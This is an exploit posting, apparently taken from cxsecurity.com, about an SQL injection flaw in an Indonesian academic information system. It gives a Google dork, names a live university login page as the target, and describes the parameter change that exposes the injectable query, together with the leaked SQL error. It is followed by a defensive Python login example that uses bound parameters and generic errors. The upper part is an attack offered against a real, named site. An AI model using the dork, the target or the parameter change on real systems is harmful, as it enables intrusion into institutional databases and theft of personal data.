Sistem Informasi Akademik SQL Injection

2019.01.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Sistem Informasi Akademik SQL Injection
# Dork: inurl:?mnux=login
# Date: 2019-01-31
# Type: Low
# Exploit Author: L4663r666h05t - RebellionGhost
# Vendor Homepage: N/A
# Tested on: Windows 10 x64

Dorking on Google: inurl:mnux?=login
or you can open this page:

Live Target: http://sisfo193.unisma.ac.id/?mnux=login

Change "?mnux=login" into "?mnux=loginprc&BypassMenu=1"

Output:

Gagal: select * from where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA = 'N' and Password=LEFT(PASSWORD(''),10) limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA' at line 2

Screenshot: http://prntscr.com/meje0q

Thanks to: ManadoGhost - RebellionGhost - ExploiterID - Berandal - Mr.Vendetta_404 - KID2ZON3 - Vlyn - Indonesia Cyber Freedom - All Indonesian Haxor
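The error output above shows the login query being assembled from request fields, with an empty table name and the raw SQL echoed back to the browser. The following is an added example, not code from the application or the advisory: a Python/sqlite3 version of the same lookup with an allowlisted table, bound parameters and a generic failure message. The table names, the `DEMO` institution code, the salted PBKDF2 columns and the assumption that the table is selected from the submitted `LevelID` are illustrative.

```python
import hashlib, hmac, logging, os, sqlite3

log = logging.getLogger("login")
GENERIC = "Login failed"          # the only failure text a client ever sees
KODE_ID = "DEMO"                  # constructed institution code
# Assumption: the table is chosen from the submitted level, so map it
# through a fixed allowlist instead of interpolating request data.
LEVEL_TABLES = {"1": "karyawan", "120": "mhsw"}   # constructed names

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_demo_db():
    """Build an in-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    for table in LEVEL_TABLES.values():
        db.execute(f"CREATE TABLE {table} (Login TEXT, LevelID TEXT, "
                   "KodeID TEXT, NA TEXT, Salt BLOB, PwHash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO mhsw VALUES (?,?,?,?,?,?)",
               ("alice", "120", KODE_ID, "N", salt, hash_password("s3cret", salt)))
    return db

def login(db, form):
    """Return (ok, message); message never contains SQL or driver text."""
    level = form.get("LevelID", "")
    user = form.get("Login", "")
    table = LEVEL_TABLES.get(level)
    if table is None or not user:      # missing or unknown fields: stop before any SQL
        return False, GENERIC
    try:
        row = db.execute(
            f"SELECT Salt, PwHash FROM {table} "   # table comes from the allowlist only
            "WHERE Login = ? AND LevelID = ? AND KodeID = ? AND NA = 'N' LIMIT 1",
            (user, level, KODE_ID)).fetchone()
    except sqlite3.Error:
        log.exception("login query failed")        # detail stays in the server log
        return False, GENERIC
    if row is None:
        return False, GENERIC
    supplied = hash_password(form.get("Password", ""), row[0])
    return (True, "OK") if hmac.compare_digest(row[1], supplied) else (False, GENERIC)
```
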


Copyright 2019, cxsecurity.com